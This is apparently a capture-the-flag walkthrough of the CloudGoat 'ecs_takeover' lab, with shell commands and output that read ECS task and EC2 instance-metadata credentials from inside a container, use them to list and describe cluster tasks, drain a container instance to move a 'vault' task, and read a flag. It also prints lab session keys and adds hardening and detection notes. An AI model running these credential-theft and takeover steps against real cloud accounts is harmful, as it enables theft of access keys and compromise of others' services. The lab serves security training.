ecs_takeover
# Deploy
% ./cloudgoat.py create scenarios/ecs_takeover
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/ecs_takeover_cgidzfcze74guw/start.txt
Start-Note = If a 503 error is returned by the ALB give a few mins for the website container to become active.
vuln-site = ec2-54-167-55-4.compute-1.amazonaws.com
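# Start
# Note: the JSON credential document shown below carries a "RoleArn" for the ...-privd role. That is the response shape of the ECS task credential endpoint (169.254.170.2 plus $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI), so it belongs to the first wget. The output of the two instance-metadata (169.254.169.254) requests for the ...-ecs-agent role is not shown on this page.
# These are short-lived session credentials (see "Expiration"). Hardening: a task should not be able to reach the instance metadata service at all, e.g. by requiring IMDSv2 with a hop limit of 1 for bridge-networked tasks, so that a compromised container cannot pick up the instance role.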
; docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4a19b685989b cloudgoat/ecs-takeover-vulnsite:latest ./main About a minute ago Up About a minute ecs-cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-vulnsite-1-vulnsite-e8c7989499bab5979101
e01ee1a603a5 busybox:latest sleep 365d About a minute ago Up About a minute ecs-cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-privd-1-privd-b0adcfcec3f5bba26100
9a875816669a amazon/amazon-ecs-agent:latest /agent About a minute ago Up About a minute (healthy) ecs-agent
; docker exec e01ee1a603a5 sh -c 'wget -O- 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
; docker exec e01ee1a603a5 sh -c 'wget -O- 169.254.169.254/latest/meta-data/iam/security-credentials/'
; docker exec e01ee1a603a5 sh -c 'wget -O- 169.254.169.254/latest/meta-data/iam/security-credentials/cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-ecs-agent'
{
"RoleArn": "arn:aws:iam::287336331436:role/cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-privd",
"AccessKeyId": "ASIAUFZUUPCWAHLUJMV7",
"SecretAccessKey": "VTKWomXS3IfkOO06aD/SKIHmYnvvR6dxTJHgKEjz",
"Token": "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",
"Expiration": "2021-09-10T12:14:15Z"
}
# List clusters
# aws --profile <container_credentials> ecs list-clusters
% aws --profile ecs-user --region us-east-1 ecs list-clusters
{
"clusterArns": [
"arn:aws:ecs:us-east-1:287336331436:cluster/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster"
]
}
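# List tasks (the command below redirects its output to text.txt; the ARNs that follow are presumably the contents of that file)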
# aws --profile <container_credentials> ecs list-tasks --cluster <your_cluster_name> --query taskArns --out text
% aws --profile ecs-user --region us-east-1 ecs list-tasks --cluster ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster --query taskArns --out text > text.txt
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8d313d075fc44dbb87881533c0dc9ea9
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/bee7d36a3b0745c9874dbbbdb41f5c93
arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/f41f196024ed4fac912f9be1b99f257a
# The following command describes the target task; its output includes the name of the corresponding service (the "group" field, e.g. service:vault) and the containerInstanceArn:
# aws --profile <container_credentials> ecs describe-tasks --cluster <your_cluster_name> --tasks <target_task>
# After describing the tasks, you will have every task mapped to its ECS container instance (the EC2 instance on which the task, and therefore its Docker containers, runs).
% aws --profile ecs-user --region us-east-1 ecs describe-tasks --cluster ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster --tasks arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b
{
"tasks": [
{
"attachments": [],
"availabilityZone": "us-east-1a",
"clusterArn": "arn:aws:ecs:us-east-1:287336331436:cluster/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster",
"connectivity": "CONNECTED",
"connectivityAt": 1631254457.317,
"containerInstanceArn": "arn:aws:ecs:us-east-1:287336331436:container-instance/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/417bbe270df2497fab3fd0f082c935c2",
"containers": [
{
"containerArn": "arn:aws:ecs:us-east-1:287336331436:container/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b/f4a5b870-83ec-4f9d-91dc-a52f4fc0c0dc",
"taskArn": "arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b",
"name": "vault",
"image": "busybox:latest",
"runtimeId": "3cff558940396ab8323eb5102cf1236724103837e8d731e031da3e4516e0d2b7",
"lastStatus": "RUNNING",
"networkBindings": [],
"networkInterfaces": [],
"healthStatus": "UNKNOWN",
"cpu": "50",
"memory": "50"
}
],
"cpu": "50",
"createdAt": 1631254457.317,
"desiredStatus": "RUNNING",
"enableExecuteCommand": false,
"group": "service:vault",
"healthStatus": "UNKNOWN",
"lastStatus": "RUNNING",
"launchType": "EC2",
"memory": "50",
"overrides": {
"containerOverrides": [
{
"name": "vault"
}
],
"inferenceAcceleratorOverrides": []
},
"pullStartedAt": 1631254459.614,
"pullStoppedAt": 1631254459.86,
"startedAt": 1631254459.743,
"startedBy": "ecs-svc/0436864570798496396",
"tags": [],
"taskArn": "arn:aws:ecs:us-east-1:287336331436:task/ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/8fc95bf535f54e62b296424b84b8965b",
"taskDefinitionArn": "arn:aws:ecs:us-east-1:287336331436:task-definition/cg-ecs-takeover-ecs_takeover_cgidzfcze74guw-vault:1",
"version": 2
}
],
"failures": []
}
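# Set the container instance that runs the target task to DRAINING. ECS places no new tasks on a draining instance and replaces its service tasks (here service:vault) on the remaining active instances; container 4807002ef95d in the docker exec lines below is presumably the rescheduled vault container.
# aws --profile <host_credentials> ecs update-container-instances-state --cluster <your_cluster_name> --container-instances <target_container_instance> --status DRAINING
# (The run below uses the profile named cloudgoat, not a profile built from the host credentials.)
# Detection and mitigation: the call is recorded in CloudTrail as UpdateContainerInstancesState. An instance role that only needs to run the ECS agent should not be granted ecs:UpdateContainerInstancesState on the cluster.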
% aws --profile cloudgoat --region us-east-1 ecs update-container-instances-state --cluster ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster --container-instances ecs-takeover-ecs_takeover_cgidzfcze74guw-cluster/417bbe270df2497fab3fd0f082c935c2 --status DRAINING
; docker exec 4807002ef95d ls
; docker exec 4807002ef95d cat FLAG.TXT